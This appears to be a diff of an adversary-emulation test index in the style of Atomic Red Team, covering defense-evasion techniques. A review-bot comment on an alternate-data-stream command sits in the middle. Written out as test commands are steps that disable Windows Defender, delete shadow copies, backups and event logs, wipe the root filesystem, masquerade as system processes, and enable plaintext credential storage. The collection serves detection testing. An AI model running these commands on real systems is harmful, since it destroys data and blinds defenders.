+7248,7 @@ defense-evasion: description: 'Attempting to disable scheduled scanning and other parts of windows defender atp - ' +' supported_platforms: - windows executor: @@ -7264,7 +7264,7 @@ defense-evasion: - name: Tamper with Windows Defender Registry description: 'Disable Windows Defender from starting after a reboot - ' +' supported_platforms: - windows executor: 
@@ -7273,11 +7273,11 @@ defense-evasion: command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 - ' +' cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 - ' +' - name: Disable Microft Office Security Features description: | Gorgon group may disable Office security features so that their code can run @@ -7311,7 +7311,7 @@ defense-evasion: command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All - ' +' T1107: technique: x_mitre_data_sources: @@ -7367,7 +7367,7 @@ defense-evasion: - name: Delete a single file - Linux/macOS description: 'Delete a single file from the temporary directory - ' +' supported_platforms: - linux - macos @@ -7380,12 +7380,12 @@ defense-evasion: name: sh command: 'rm -f #{file_to_delete} - ' +' - name: Delete an entire folder - Linux/macOS description: 'Recursively delete the temporary directory and all files contained within it - ' +' supported_platforms: - linux - macos @@ -7398,12 +7398,12 @@ defense-evasion: name: sh command: 'rm -rf #{folder_to_delete} - ' +' - name: Overwrite and delete a file with shred description: 'Use the `shred` command to overwrite the temporary file and then delete it - ' +' supported_platforms: - linux input_arguments: @@ -7415,11 +7415,11 @@ defense-evasion: name: sh command: 'shred -u #{file_to_shred} - ' +' - name: Delete a single file - Windows cmd description: 'Delete a single file from the temporary directory using cmd.exe - ' +' supported_platforms: - windows executor: @@ -7432,7 +7432,7 @@ defense-evasion: description: 'Recursively delete the temporary directory and all files contained within it using cmd.exe - ' +' supported_platforms: - windows executor: 
@@ -7444,7 +7444,7 @@ defense-evasion: - name: Delete a single file - Windows PowerShell description: 'Delete a single file from the temporary directory using Powershell - ' +' supported_platforms: - windows executor: @@ -7457,7 +7457,7 @@ defense-evasion: description: 'Recursively delete the temporary directory and all files contained within it using Powershell - ' +' supported_platforms: - windows input_arguments: @@ -7474,7 +7474,7 @@ defense-evasion: - name: Delete VSS - vssadmin description: 'Delete all volume shadow copies with vssadmin.exe - ' +' supported_platforms: - windows executor: @@ -7482,11 +7482,11 @@ defense-evasion: elevation_required: true command: 'vssadmin.exe Delete Shadows /All /Quiet - ' +' - name: Delete VSS - wmic description: 'Delete all volume shadow copies with wmic - ' +' supported_platforms: - windows executor: @@ -7494,11 +7494,11 @@ defense-evasion: elevation_required: true command: 'wmic shadowcopy delete - ' +' - name: bcdedit description: 'This test leverages `bcdedit` to remove boot-time recovery measures. - ' +' supported_platforms: - windows executor: @@ -7510,7 +7510,7 @@ defense-evasion: - name: wbadmin description: 'This test deletes Windows Backup catalogs. - ' +' supported_platforms: - windows executor: @@ -7518,25 +7518,25 @@ defense-evasion: elevation_required: true command: 'wbadmin delete catalog -quiet - ' +' - name: Delete Filesystem - Linux description: 'This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. - ' +' supported_platforms: - linux executor: name: bash command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null - ' +' - name: Delete-PrefetchFile description: 'Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. - ' +' supported_platforms: - windows executor: 
@@ -7545,7 +7545,7 @@ defense-evasion: command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0]) - ' +' - name: Delete TeamViewer Log Files description: | Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration. @@ -7664,7 +7664,7 @@ defense-evasion: description: 'Modifies the filesystem permissions of the specified file or folder to take ownership of the object. - ' +' supported_platforms: - windows input_arguments: @@ -7676,12 +7676,12 @@ defense-evasion: name: command_prompt command: 'takeown.exe /f #{file_folder_to_own} - ' +' - name: Take ownership recursively using takeown utility description: 'Modifies the filesystem permissions of the specified folder to take ownership of it and its contents. - ' +' supported_platforms: - windows input_arguments: @@ -7693,12 +7693,12 @@ defense-evasion: name: command_prompt command: 'takeown.exe /f #{folder_to_own} /r - ' +' - name: cacls - Grant permission to specified user or group description: 'Modifies the filesystem permissions of the specified file or folder to allow the specified user or group Full Control. - ' +' supported_platforms: - windows input_arguments: @@ -7714,12 +7714,12 @@ defense-evasion: name: command_prompt command: 'cacls.exe #{file_or_folder} /grant #{user_or_group}:F - ' +' - name: cacls - Grant permission to specified user or group recursively description: 'Modifies the filesystem permissions of the specified folder and contents to allow the specified user or group Full Control. - ' +' supported_platforms: - windows input_arguments: 
@@ -7735,12 +7735,12 @@ defense-evasion: name: command_prompt command: 'cacls.exe #{file_or_folder} /grant #{user_or_group}:F /t - ' +' - name: icacls - Grant permission to specified user or group description: 'Modifies the filesystem permissions of the specified file or folder to allow the specified user or group Full Control. - ' +' supported_platforms: - windows input_arguments: @@ -7756,12 +7756,12 @@ defense-evasion: name: command_prompt command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F - ' +' - name: icacls - Grant permission to specified user or group recursively description: 'Modifies the filesystem permissions of the specified folder and contents to allow the specified user or group Full Control. - ' +' supported_platforms: - windows input_arguments: @@ -7777,12 +7777,12 @@ defense-evasion: name: command_prompt command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F /t - ' +' - name: attrib - Remove read-only attribute description: 'Removes the read-only attribute from a file or folder using the attrib.exe command. - ' +' supported_platforms: - windows input_arguments: @@ -7794,12 +7794,12 @@ defense-evasion: name: command_prompt command: 'attrib.exe -r #{file_or_folder} - ' +' - name: chmod - Change file or folder mode (numeric mode) description: 'Changes a file or folder''s permissions using chmod and a specified numeric mode. - ' +' supported_platforms: - macos - linux @@ -7816,12 +7816,12 @@ defense-evasion: name: bash command: 'chmod #{numeric_mode} #{file_or_folder} - ' +' - name: chmod - Change file or folder mode (symbolic mode) description: 'Changes a file or folder''s permissions using chmod and a specified symbolic mode. - ' +' supported_platforms: - macos - linux 
@@ -7838,12 +7838,12 @@ defense-evasion: name: bash command: 'chmod #{symbolic_mode} #{file_or_folder} - ' +' - name: chmod - Change file or folder mode (numeric mode) recursively description: 'Changes a file or folder''s permissions recursively using chmod and a specified numeric mode. - ' +' supported_platforms: - macos - linux @@ -7860,12 +7860,12 @@ defense-evasion: name: bash command: 'chmod #{numeric_mode} #{file_or_folder} -R - ' +' - name: chmod - Change file or folder mode (symbolic mode) recursively description: 'Changes a file or folder''s permissions recursively using chmod and a specified symbolic mode. - ' +' supported_platforms: - macos - linux @@ -7882,12 +7882,12 @@ defense-evasion: name: bash command: 'chmod #{symbolic_mode} #{file_or_folder} -R - ' +' - name: chown - Change file or folder ownership and group description: 'Changes a file or folder''s ownership and group information using chown. - ' +' supported_platforms: - macos - linux @@ -7908,12 +7908,12 @@ defense-evasion: name: bash command: 'chown #{owner}:#{group} #{file_or_folder} - ' +' - name: chown - Change file or folder ownership and group recursively description: 'Changes a file or folder''s ownership and group information recursively using chown. - ' +' supported_platforms: - macos - linux @@ -7934,11 +7934,11 @@ defense-evasion: name: bash command: 'chown #{owner}:#{group} #{file_or_folder} -R - ' +' - name: chown - Change file or folder mode ownership only description: 'Changes a file or folder''s ownership only using chown. - ' +' supported_platforms: - macos - linux @@ -7955,11 +7955,11 @@ defense-evasion: name: bash command: 'chown #{owner} #{file_or_folder} - ' +' - name: chown - Change file or folder ownership recursively description: 'Changes a file or folder''s ownership only recursively using chown. - ' +' supported_platforms: - macos - linux 
@@ -7976,7 +7976,7 @@ defense-evasion: name: bash command: 'chown #{owner} #{file_or_folder} -R - ' +' - name: chattr - Remove immutable file attribute description: | Remove's a file's `immutable` attribute using `chattr`. @@ -7993,7 +7993,7 @@ defense-evasion: name: sh command: 'chattr -i #{file_to_modify} - ' +' T1144: technique: x_mitre_permissions_required: @@ -8072,7 +8072,7 @@ defense-evasion: - name: Gatekeeper Bypass description: 'Gatekeeper Bypass via command line - ' +' supported_platforms: - macos input_arguments: @@ -8136,7 +8136,7 @@ defense-evasion: - name: Disable history collection description: 'Disables history collection in shells - ' +' supported_platforms: - linux - macos @@ -8231,7 +8231,7 @@ defense-evasion: - name: Create a hidden file in a hidden directory description: 'Creates a hidden file inside a hidden directory - ' +' supported_platforms: - linux - macos @@ -8243,11 +8243,11 @@ defense-evasion: echo "T1158" > /var/tmp/.hidden-directory/.hidden-file cleanup_command: 'rm -rf /var/tmp/.hidden-directory/ - ' +' - name: Mac Hidden file description: 'Hide a file on MacOS - ' +' supported_platforms: - macos executor: @@ -8256,12 +8256,12 @@ defense-evasion: command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00" - ' +' - name: Create Windows System File with Attrib description: 'Creates a file and marks it as a system file using the attrib.exe utility. - ' +' supported_platforms: - windows executor: @@ -8272,11 +8272,11 @@ defense-evasion: attrib.exe +s %TEMP%\T1158.txt cleanup_command: 'del /A:S %TEMP%\T1158.txt >nul 2>&1 - ' +' - name: Create Windows Hidden File with Attrib description: 'Creates a file and marks it as hidden using the attrib.exe utility. - ' +' supported_platforms: - windows executor: 
@@ -8287,11 +8287,11 @@ defense-evasion: attrib.exe +h %TEMP%\T1158_hidden.txt cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1 - ' +' - name: Hidden files description: 'Requires Apple Dev Tools - ' +' supported_platforms: - macos input_arguments: @@ -8304,11 +8304,11 @@ defense-evasion: elevation_required: false command: 'setfile -a V #(unknown) - ' +' - name: Hide a Directory description: 'Hide a directory on MacOS - ' +' supported_platforms: - macos executor: @@ -8319,11 +8319,11 @@ defense-evasion: chflags hidden /var/tmp/T1158_mac.txt cleanup_command: 'rm /var/tmp/T1158_mac.txt - ' +' - name: Show all hidden files description: 'Show all hidden files on MacOS - ' +' supported_platforms: - macos executor: @@ -8331,15 +8331,15 @@ defense-evasion: elevation_required: false command: 'defaults write com.apple.finder AppleShowAllFiles YES - ' +' cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO - ' +' - name: Create ADS command prompt description: 'Create an Alternate Data Stream with the command prompt. Write access is required. - ' +' supported_platforms: - windows input_arguments: @@ -8357,15 +8357,15 @@ defense-evasion: command: | echo "Normal Text." > #{file_name} echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename} - for /f "usebackq delims=╧å" %i in (#{file_name}:#{ads_filename}) do %i + for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i cleanup_command: 'del #{file_name} >nul 2>&1 - ' +' - name: Create ADS PowerShell description: 'Create an Alternate Data Stream with PowerShell. Write access is required. - ' +' supported_platforms: - windows input_arguments: @@ -8387,7 +8387,7 @@ defense-evasion: ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore - ' +' T1147: technique: x_mitre_data_sources: 
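Review bot: The replacement delimiter `φ` on the `for /f` line in the Create ADS command prompt test is still a non-ASCII character, so the command remains dependent on the code page used by the console and by whatever reads the file — the `╧å` being fixed here is exactly the CP437 rendering of φ's UTF-8 bytes, and the same mojibake can recur on the next round-trip through an editor or generator. The intent appears to be "no delimiter, so the whole line lands in %i", which cmd expresses natively with an empty delimiter set: `for /f "usebackq delims=" %i in (#{file_name}:#{ads_filename}) do %i`. That removes the encoding dependency and makes the executed line match the stream content regardless of code page; if the same command is duplicated elsewhere in the repository, it should be changed consistently.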
@@ -8435,7 +8435,7 @@ defense-evasion: - name: Hidden Users description: 'Add a hidden user on MacOS - ' +' supported_platforms: - macos input_arguments: @@ -8447,7 +8447,7 @@ defense-evasion: name: sh command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333 - ' +' T1143: technique: x_mitre_permissions_required: @@ -8507,7 +8507,7 @@ defense-evasion: description: 'Launch PowerShell with the "-WindowStyle Hidden" argument to conceal PowerShell windows by setting the WindowStyle parameter to hidden. - ' +' supported_platforms: - windows input_arguments: @@ -8524,7 +8524,7 @@ defense-evasion: elevation_required: false command: 'Start-Process #{powershell_command} - ' +' T1183: technique: x_mitre_data_sources: @@ -8614,7 +8614,7 @@ defense-evasion: - name: IFEO Add Debugger description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -8632,15 +8632,15 @@ defense-evasion: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" - ' +' cleanup_command: 'reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f - ' +' - name: IFEO Global Flags description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -8744,7 +8744,7 @@ defense-evasion: - name: Clear Logs description: 'Clear Windows Event Logs - ' +' supported_platforms: - windows input_arguments: @@ -8757,12 +8757,12 @@ defense-evasion: elevation_required: true command: 'wevtutil cl #{log_name} - ' +' - name: FSUtil description: 'Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. - ' +' supported_platforms: - windows executor: 
@@ -8770,11 +8770,11 @@ defense-evasion: elevation_required: true command: 'fsutil usn deletejournal /D C: - ' +' - name: rm -rf description: 'Delete system and audit logs - ' +' supported_platforms: - macos - linux @@ -8788,7 +8788,7 @@ defense-evasion: This technique was used by threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -8800,12 +8800,12 @@ defense-evasion: name: bash command: 'echo 0> /var/spool/mail/#{username} - ' +' - name: Overwrite Linux Log description: 'This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -8817,12 +8817,12 @@ defense-evasion: name: bash command: 'echo 0> #{log_path} - ' +' - name: Delete System Logs Using PowerShell description: 'Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments - ' +' supported_platforms: - windows executor: @@ -8834,11 +8834,11 @@ defense-evasion: Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx cleanup_command: 'Start-Service -Name EventLog - ' +' - name: Delete System Logs Using Clear-EventLogId description: 'Clear event logs using built-in PowerShell commands - ' +' supported_platforms: - windows executor: @@ -8846,7 +8846,7 @@ defense-evasion: elevation_required: true command: 'Clear-EventLog -logname Application - ' +' T1202: technique: x_mitre_data_sources: @@ -9042,7 +9042,7 @@ defense-evasion: - name: Install root CA on CentOS/RHEL description: 'Creates a root CA with openssl - ' +' supported_platforms: - linux input_arguments: @@ -9124,7 +9124,7 @@ defense-evasion: description: 'Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. - ' +' supported_platforms: - windows input_arguments: 
@@ -9190,7 +9190,7 @@ defense-evasion: description: 'Executes the InstallHelper class constructor runner instead of executing InstallUtil. - ' +' supported_platforms: - windows input_arguments: @@ -9257,7 +9257,7 @@ defense-evasion: - name: InstallUtil class constructor method call description: 'Executes the installer assembly class constructor. - ' +' supported_platforms: - windows input_arguments: @@ -9324,7 +9324,7 @@ defense-evasion: - name: InstallUtil Install method call description: 'Executes the Install Method - ' +' supported_platforms: - windows input_arguments: @@ -9391,7 +9391,7 @@ defense-evasion: - name: InstallUtil Uninstall method call - /U variant description: 'Executes the Uninstall Method - ' +' supported_platforms: - windows input_arguments: @@ -9459,7 +9459,7 @@ defense-evasion: variant description: 'Executes the Uninstall Method - ' +' supported_platforms: - windows input_arguments: @@ -9526,7 +9526,7 @@ defense-evasion: - name: InstallUtil HelpText method call description: 'Executes the Uninstall Method - ' +' supported_platforms: - windows input_arguments: @@ -9594,7 +9594,7 @@ defense-evasion: description: 'Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. - ' +' supported_platforms: - windows input_arguments: @@ -9711,14 +9711,14 @@ defense-evasion: - name: Launchctl description: 'Utilize launchctl - ' +' supported_platforms: - macos executor: name: sh command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator - ' +' T1036: technique: x_mitre_data_sources: @@ -9833,7 +9833,7 @@ defense-evasion: description: 'Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe. - ' +' supported_platforms: - windows executor: 
@@ -9844,12 +9844,12 @@ defense-evasion: cmd.exe /c %SystemRoot%\Temp\lsass.exe cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 - ' +' - name: Masquerading as Linux crond process. description: 'Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon. - ' +' supported_platforms: - linux executor: @@ -9862,7 +9862,7 @@ defense-evasion: description: 'Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. - ' +' supported_platforms: - windows executor: @@ -9873,12 +9873,12 @@ defense-evasion: cmd.exe /c %APPDATA%\notepad.exe /B cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1 - ' +' - name: Masquerading - wscript.exe running as svchost.exe description: 'Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe. - ' +' supported_platforms: - windows executor: @@ -9889,12 +9889,12 @@ defense-evasion: cmd.exe /c %APPDATA%\svchost.exe /B cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1 - ' +' - name: Masquerading - powershell.exe running as taskhostw.exe description: 'Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe. - ' +' supported_platforms: - windows executor: @@ -9905,12 +9905,12 @@ defense-evasion: cmd.exe /K %APPDATA%\taskhostw.exe cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1 - ' +' - name: Masquerading - non-windows exe running as windows exe description: 'Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe - ' +' supported_platforms: - windows input_arguments: 
@@ -9938,12 +9938,12 @@ defense-evasion: Stop-Process -ID $myT1036 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore - ' +' - name: Masquerading - windows exe running as different windows exe description: 'Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe - ' +' supported_platforms: - windows input_arguments: @@ -9964,7 +9964,7 @@ defense-evasion: Stop-Process -ID $myT1036 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore - ' +' - name: Malicious process Masquerading as LSM.exe description: | Detect LSM running from an incorrect directory and an incorrect service account @@ -10066,7 +10066,7 @@ defense-evasion: description: 'Modify the registry of the currently logged in user using reg.exe cia cmd console - ' +' supported_platforms: - windows executor: @@ -10075,11 +10075,11 @@ defense-evasion: command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f - ' +' cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f - ' +' - name: Modify Registry of Local Machine - cmd description: | Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when @@ -10092,16 +10092,16 @@ defense-evasion: command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f - ' +' cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f - ' +' - name: Modify Registry of Another User Profile description: 'Modify a registry key of each user profile not currently loaded on the machine using both powershell and cmd line tools. - ' +' supported_platforms: - windows executor: 
@@ -10164,7 +10164,7 @@ defense-evasion: description: 'Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping) - ' +' supported_platforms: - windows executor: @@ -10173,16 +10173,16 @@ defense-evasion: command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f - ' +' cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f - ' +' - name: Modify registry to store PowerShell code description: 'Sets Windows Registry key containing base64-encoded PowerShell code. - ' +' supported_platforms: - windows input_arguments: @@ -10210,7 +10210,7 @@ defense-evasion: cleanup_command: 'Remove-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -ErrorAction Ignore - ' +' - name: Add domain to Trusted sites Zone description: | Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365 as described here: @@ -10233,7 +10233,7 @@ defense-evasion: - name: Javascript in registry description: 'placing javascript in registry for persistence - ' +' supported_platforms: - windows executor: @@ -10242,7 +10242,7 @@ defense-evasion: command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "